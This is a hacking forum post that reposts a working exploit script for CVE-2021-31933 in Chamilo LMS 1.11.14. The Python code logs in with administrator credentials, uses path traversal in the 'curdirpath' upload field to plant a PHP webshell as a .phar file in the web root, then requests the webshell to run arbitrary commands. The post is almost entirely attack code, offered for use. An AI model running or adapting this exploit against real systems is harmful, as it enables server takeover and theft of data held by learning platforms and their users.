Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)

 Share


HACK1949

Recommended Posts

# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
# Date: 13/05/2021
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms
# Version: 1.11.14
# Tested on: Ubuntu 20.04.2 LTS
# CVE: CVE-2021-31933
# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/

from requests import Session
from random import choice
from string import ascii_lowercase

import requests

# This is all configuration stuff, 
url = "http://127.0.0.1/chamilo-lms/"  # URL to remote host web root
user_name = "admin"  # User must be an administrator
password = "admin"
command = "id;whoami"

# Where you want to upload your webshell. Must be writable by web server user.
# This spot isn't protectec by .htaccess
webshell_path = 'web/' 
webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar" # Just a random name for webshell file
content = f"<?php echo `{command}`; ?>" 

def main():
    # Run a context manager with a session object to hold login session after login
    with Session() as s:
        login_url = f"{url}index.php"
        login_data = {
            "login": user_name,
            "password": password
        }
        r = s.post(login_url, data=login_data) # login request

        # Check to see if login as admin user was successful.
        if "admin" not in r.url:
            print(f"[-] Login as {user_name} failed. Need to be admin")
            return
        print(f"[+] Logged in as {user_name}")
        print(f"[+] Cookie: {s.cookies}")
        file_upload_url = f"{url}main/upload/upload.php"
        # The 'curdirpath' is not santitized, so I traverse to  the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well
        php_webshell_file = {
            "curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"),
            "user_upload": (webshell_name, content)
            }
        
        ## Good command if you want to see what the request looks like without sending
        # print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))

        # Two requests required to actually upload the file
        for i in range(2):
            s.post(file_upload_url, files=php_webshell_file)

        exploit_request_url = f"{url}{webshell_path}{webshell_name}"
        print("[+] Upload complete!")
        print(f"[+] Webshell: {exploit_request_url}")

        # This is a GET request to the new webshell to trigger code execution
        command_output = s.get(exploit_request_url)
        print("[+] Command output:\n")
        print(command_output.text)



if __name__ == "__main__":
    main()
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...